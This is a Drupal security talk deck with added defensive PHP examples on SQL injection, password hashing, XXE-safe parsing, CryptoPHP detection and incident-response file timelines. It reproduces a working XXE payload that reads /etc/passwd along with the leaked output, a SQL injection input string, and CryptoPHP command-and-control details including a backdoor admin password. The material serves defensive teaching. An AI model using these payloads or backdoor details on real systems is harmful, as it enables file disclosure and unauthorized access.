Drupal, Lessons learnt from real world security incidents
Dr. Pedram Hayati
Partner and Security Consultant, elttam
DrupalGlamp, Sydney, 5 September 2015
Drupal Security
Looking from an attacker angle
Targeting the software
• Publicly known weaknesses or 0days
• Drupal core or modules
Targeting a user
• Social engineering
Targeting a developer
• Watering hole attacks
What a security tester should know!
Security is not a high priority
• Sad but true
• If software is not usable, it doesn't matter whether it is secure or not.
• The security tester is not the only stakeholder
Learn the terminology
• Defect and bug instead of 0day and vulnerability
• Enhancement instead of best-practice recommendation
Explain "how to fix", not "how to break"
• Security testers are excited to show how to hack the planet
• Devs care about how to effectively fix things
• One size doesn't fit all.
• Testers spend a lot on issue detail but little on the remediation plan.
Show some respect!
• Don't bash developers or be negative toward them.
Targeting software
Pre-Auth SQL Injection in Drupal Core
15 October 2014
• A major SQL injection vulnerability within Drupal Core
• CVE-2014-3704
• Likelihood: Pre-auth
• Impact: privilege escalation, code execution
• You are likely compromised if you haven't patched your Drupal within 7 hours of this issue being announced.
• https://www.drupal.org/node/2357241
Hardening - Generic
Remember, Drupal has a higher risk profile.
• Subscribe to security feeds
• Have backups and make sure they work
• Be ready and prepare your (basic) incident response strategy
• References
  Drupal security feed: https://www.drupal.org/security/psa
  Security team contact: https://security.drupal.org/team-members
  Incident response plan: http://www.comptechdoc.org/independent/security/policies/incident-response-plan.html
  https://twitter.com/drupalsecurity
Hardening – Secure coding
Principle #1: Defend as close as possible to the destination
• Use parametrized queries
  Use db_query() and db_rewrite_sql() and never concatenate the data
• Use Drupal's check functions for output filtering
  Use check_plain(), check_markup(), check_url() and filter_xss()
• JavaScript validation is not validation: it runs on the client, so there is effectively none
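Added example (not from the slides) of Principle #1: the same lookup written with string concatenation and with a bound parameter, against an in-memory SQLite database through PDO (the pdo_sqlite extension is assumed). Drupal 7's db_query() takes the same :name placeholders, so the discipline carries over unchanged.

```php
<?php
// Added example, not from the talk: string concatenation versus a bound
// parameter, shown with an in-memory SQLite database through PDO (the
// pdo_sqlite extension is assumed). Drupal 7's db_query() uses the same
// :name placeholders, so the discipline carries over unchanged.

function build_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE users (uid INTEGER PRIMARY KEY, name TEXT)');
    $pdo->exec("INSERT INTO users (name) VALUES ('alice'), ('bob')");
    return $pdo;
}

// Vulnerable: the caller's string becomes part of the SQL text.
function find_user_unsafe(PDO $pdo, string $name): array
{
    $sql = "SELECT uid, name FROM users WHERE name = '" . $name . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Safe: the string travels as a bound value; the SQL text never changes.
function find_user_safe(PDO $pdo, string $name): array
{
    $stmt = $pdo->prepare('SELECT uid, name FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo   = build_db();
$input = "x' OR '1'='1";   // constructed input, not a real username
printf("unsafe: %d rows\n", count(find_user_unsafe($pdo, $input)));  // 2: the WHERE clause was rewritten
printf("safe:   %d rows\n", count(find_user_safe($pdo, $input)));    // 0: no user has that literal name
```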
Principle #2: It is not just input and output handling
• Understand Cross-Site Request Forgery (XSRF)
• Use the Form API
Principle #3: File upload is difficult to secure
• Avoid file upload where possible
• Re-produce the file (e.g. with the GD library)
• Check the MIME type, magic numbers, byte codes.
Hardening – Secure coding
Principle #4: Remember hash algorithms are ever evolving
• MD5 = plaintext. SHA1 ~= plaintext
• Use a slow hashing algorithm
  scrypt -> bcrypt (15 rounds) -> PBKDF2 with SHA256
• Salt the hash
• Use Hash-based Message Authentication Code (HMAC)
• drupal_hmac uses sha256, which is not recommended.
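Added example (not from the slides) for Principle #4: a fast unsalted digest beside a slow salted one, and an HMAC with a constant-time check. It uses PHP's own password_hash() (bcrypt) and hash_hmac(); the sample password, token and key are constructed.

```php
<?php
// Added example, not from the talk: a fast digest beside a slow salted hash,
// plus an HMAC. Uses PHP's own password_hash() (bcrypt) and hash_hmac();
// sample password and token are constructed.

// Fast, unsalted: identical passwords give identical digests and a guess
// costs microseconds, which is why the slide calls it plaintext.
function fast_hash(string $password): string
{
    return md5($password);
}

// Slow and salted: bcrypt generates its own salt and stores it inside the
// returned string; cost is the work factor (the slide suggests 15, 12 keeps
// this demo quick).
function slow_hash(string $password, int $cost = 12): string
{
    return password_hash($password, PASSWORD_BCRYPT, ['cost' => $cost]);
}

function check_password(string $password, string $stored): bool
{
    return password_verify($password, $stored);
}

// HMAC: proves a value was produced by someone holding the key.
function sign(string $data, string $key): string
{
    return hash_hmac('sha256', $data, $key);
}

function verify_signature(string $data, string $key, string $mac): bool
{
    return hash_equals(sign($data, $key), $mac);   // constant-time comparison
}

$pw = 'hunter2';                                     // constructed sample
echo fast_hash($pw), "\n";                           // same digest every time
$h1 = slow_hash($pw);
$h2 = slow_hash($pw);
var_dump($h1 !== $h2);                               // true: fresh salt each call
var_dump(check_password($pw, $h1));                  // true
var_dump(check_password('wrong', $h1));              // false
$key = random_bytes(32);
$mac = sign('uid=42', $key);
var_dump(verify_signature('uid=42', $key, $mac));    // true
var_dump(verify_signature('uid=43', $key, $mac));    // false
```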
Pre-Auth XXE
24 March 2015
• XML External Entity (XXE)
  An XML document has a reference to a user-controllable field that includes an external entity
• A weakness within the Services module
• Allows arbitrary file read (e.g. settings.php)
• By Renaud Dubourguais from Synacktiv on 24 March 2015
• http://www.synacktiv.fr/ressources/synacktiv_drupal_xxe_services.pdf
Pre-Auth XXE: Sample payload
POST /drupal7.28/?q=test/node HTTP/1.1
[...]
<!DOCTYPE root [<!ENTITY % evil SYSTEM "file:///etc/passwd">%evil;]>
<xml>
 <test>test</test>
</xml>
Pre-Auth XXE: Response
<?xml version="1.0" encoding="utf8"?>
<result>Line 5, Col 9: failed to load external entity &quot;file:[...]W00T&quot;
Line 9, Col 27: Opening and ending tag mismatch: test line 9 and type</result>
Pre-Auth XXE: Response
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
How to fix it?
• Input validation?
• Output validation or rendering?
• Business logic
  Access control
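Added example (not from the slides, and not the Services module's own code) of what the input-validation answer looks like in PHP: parse client-supplied XML so that a DOCTYPE carrying an external entity, like the one in the sample payload, is refused rather than resolved, and keep libxml's diagnostics server-side instead of echoing them in the response. The hostile input is constructed with a placeholder path.

```php
<?php
// Added example, not from the talk: parse client-supplied XML (as the
// Services endpoint in the slide does) so that a DOCTYPE carrying an
// external entity is refused instead of resolved.

function parse_untrusted_xml(string $raw): ?DOMDocument
{
    // A DTD is the only place an entity can be declared, and an API payload
    // never needs one, so reject the document outright if one is present.
    if (preg_match('/<!DOCTYPE/i', $raw) === 1) {
        return null;
    }
    if (PHP_VERSION_ID < 80000) {
        // PHP < 8.0 still loads external entities by default; switch it off.
        libxml_disable_entity_loader(true);
    }
    $previous = libxml_use_internal_errors(true);   // collect, don't print
    $doc = new DOMDocument();
    // LIBXML_NONET forbids network fetches while parsing. LIBXML_NOENT is
    // deliberately absent: it would turn entity substitution on.
    $ok = $doc->loadXML($raw, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    // Parser diagnostics stay server-side: the slide's response leaked the
    // file contents through the "failed to load external entity" message.
    return $ok ? $doc : null;
}

// Constructed inputs; the SYSTEM path is a placeholder.
$benign  = '<xml><test>test</test></xml>';
$hostile = '<!DOCTYPE root [<!ENTITY % evil SYSTEM "file:///path/to/secret">%evil;]>'
         . '<xml><test>test</test></xml>';

$doc = parse_untrusted_xml($benign);
echo $doc ? $doc->getElementsByTagName('test')->item(0)->textContent : 'rejected', "\n"; // test
echo parse_untrusted_xml($hostile) ? 'parsed' : 'rejected', "\n";                        // rejected
```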
Targeting user
CryptoPHP
20 November 2014 by Fox-IT
• Large number of backdoored CMSs including Drupal, Joomla and WordPress
• Used for blackhat SEO
CryptoPHP
C2 communication
{
  "servers": ["127.0.0.1", "127.0.0.2"],
  "eval": ["print(system('ls -la'));", "phpinfo();"],
  "echo": ["strings to be echoed", "etc."],
}
Mail communication
• For failover
Manual control
• http://127.0.0.1/index.php?<serverkey>=reset
Encrypted communication
Adds a new admin account for future access
• Username: system[0-9]*
• Password: FUHIAsbdiugAS
CryptoPHP
Spread through
• Pirated themes
• Commercial plugins for free
• Nulled scripts
Remediation
Look inside your theme (and modules) directory for:
<?php include('images/social.png'); ?>
Check the authenticity of your packages
• Use legitimate sources
Check the integrity of the downloaded packages
• Checksum
More info: https://foxitsecurity.files.wordpress.com/2014/11/cryptophp-whitepaper-foxsrt-v4.pdf
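Added example (not from the slides or the Fox-IT paper) that automates the "look inside your theme directory" step: it walks a directory tree and reports every PHP source file that include()s or require()s something with an image extension, the pattern the slide describes. The list of code extensions, the regex and the fixture paths are my choices.

```php
<?php
// Added example, not from the talk: a scanner for the CryptoPHP tell-tale on
// the slide, a PHP file that include()s or require()s something with an image
// extension. File extensions scanned and the fixture paths are my choices.

function suspicious_includes(string $root): array
{
    $pattern = '/\b(include|require)(_once)?\s*\(?\s*[\'"][^\'"]*\.(png|jpe?g|gif|ico|bmp)[\'"]/i';
    $code    = ['php', 'inc', 'module', 'theme', 'install'];
    $hits    = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        if (!in_array(strtolower($file->getExtension()), $code, true)) {
            continue;
        }
        $src = file_get_contents($file->getPathname());
        if ($src !== false && preg_match($pattern, $src, $m, PREG_OFFSET_CAPTURE)) {
            $line   = substr_count($src, "\n", 0, $m[0][1]) + 1;   // 1-based line of the match
            $hits[] = ['file' => $file->getPathname(), 'line' => $line, 'match' => $m[0][0]];
        }
    }
    return $hits;
}

// Constructed fixture: a fake theme directory with one clean file and one
// carrying the include from the slide.
$theme = sys_get_temp_dir() . '/theme_' . bin2hex(random_bytes(4));
mkdir($theme, 0700, true);
file_put_contents("$theme/template.php", "<?php\nprint 'hello';\n");
file_put_contents("$theme/footer.php", "<?php\n\ninclude('images/social.png');\n?>\n");

foreach (suspicious_includes($theme) as $h) {
    printf("%s:%d  %s\n", $h['file'], $h['line'], $h['match']);   // footer.php:3
}
```

A hit is a lead, not a verdict: open the flagged file and the referenced "image" and confirm what the include actually pulls in.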
Targeting developer
Watering Hole Attack
An attack strategy targeted toward user groups
• Developers, operations, normal users
Commonly a website that is used by the victim group is infected. The victim group is eventually infected through the infected website.
November 2014
• Forbes.com compromised
• 0day for IE and Flash
• Targets: US defence, financial services
Awareness
Developers
• Typically have high-privileged access on the local machine or network services
• Increase the security of your browser
  Add-on: NoScript
  Add-on: Web of Trust (WOT)
  Use a different profile or browser for surfing the web and doing work
  Have a read about the capabilities of the BeEF framework: http://beefproject.com/
• Increase the security of your email client
  Increase the security settings of Outlook
  Default all emails to plain text
  Keep personal and work email in separate email clients, even on your smartphone
• Use trusted sources
• Verify the integrity of downloaded files
Unhack my website
1. Make a (forensic) copy of your entire server
   1. Do not change anything
   2. Get a snapshot of your Cloud/VM instance
2. Take your website offline
3. Notify users and stakeholders.
4. Start the investigation process
   1. It is likely automated. Search for known signatures
   2. Check the integrity of all files
      1. Drupal Hacked module: https://www.drupal.org/project/hacked
   3. Use available tools
      1. Sort files and other data based on time
      2. Create a timeline
5. Call for help
6. Rebuild your website
   1. Restore an older snapshot
   2. Apply all patches.
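Added example (not from the slides, and not the Hacked module) that combines steps 4.2 and 4.3 of the procedure above: a baseline manifest of sha256 digests and mtimes, assumed to have been taken from a known-good copy of the site, is compared with the live tree, and every added, modified or deleted file is listed oldest-first as a timeline. The fixture is constructed in a temp directory; PHP 7.4 or later is assumed.

```php
<?php
// Added example, not from the talk: "check integrity of all files" and
// "sort by time" in one script. A baseline manifest (assumed taken from a
// known-good copy) is compared with the live tree, oldest change first.
function manifest(string $root): array
{
    $out = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $f) {
        $rel = substr($f->getPathname(), strlen($root) + 1);   // path relative to $root
        $out[$rel] = ['sha256' => hash_file('sha256', $f->getPathname()), 'mtime' => $f->getMTime()];
    }
    return $out;
}

// Returns [[relative path, status, mtime], ...] sorted by mtime ascending; deleted files have no live mtime and sort first.
function diff_timeline(array $baseline, array $live): array
{
    $events = [];
    foreach ($live as $rel => $info) {
        if (!isset($baseline[$rel])) {
            $events[] = [$rel, 'added', $info['mtime']];
        } elseif ($baseline[$rel]['sha256'] !== $info['sha256']) {
            $events[] = [$rel, 'modified', $info['mtime']];
        }
    }
    foreach (array_diff_key($baseline, $live) as $rel => $_) {
        $events[] = [$rel, 'deleted', 0];
    }
    usort($events, fn($a, $b) => $a[2] <=> $b[2]);
    return $events;
}

// Constructed fixture: baseline a tiny site, then make two changes a second apart.
$root = sys_get_temp_dir() . '/site_' . bin2hex(random_bytes(4));
mkdir("$root/sites/default", 0700, true);
file_put_contents("$root/index.php", "<?php // clean\n");
file_put_contents("$root/sites/default/settings.php", "<?php // clean\n");
$baseline = manifest($root);
sleep(1);
file_put_contents("$root/index.php", "<?php // constructed: altered after baseline\n");
sleep(1);
file_put_contents("$root/sites/default/unexpected.php", "<?php // constructed: new file\n");
foreach (diff_timeline($baseline, manifest($root)) as [$rel, $status, $mtime]) {
    printf("%s  %-8s %s\n", date('Y-m-d H:i:s', $mtime), $status, $rel);   // index.php modified, then unexpected.php added
}
```

Run it against the forensic copy from step 1, never the live server, so the mtimes you are sorting are the ones the intruder left behind.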
Bonus
An actual attack can come days later
• There are different threat actors behind attacks:
  https://blog.smarthoneypot.com/in-depth-analysis-of-ssh-attacks-on-amazon-ec2/
• Go back in time
  Malware names are randomised
• Look into outbound network connections
  tcpdump
  Malware is renamed to look like legitimate executables
• Your best friends
  lsof, strace, netstat
Wrap up
My point was to provide you with awareness
Attackers find the easiest and most effective way to target
• Software
• Users
• Developers
Keep up-to-date with the Drupal security feed
Get yourself engaged in local security communities.
Thank You
To receive recommendations on protecting your Drupal, reach me at:
Email: [email protected]
Twitter: pi3ch
Web: https://elttam.com.au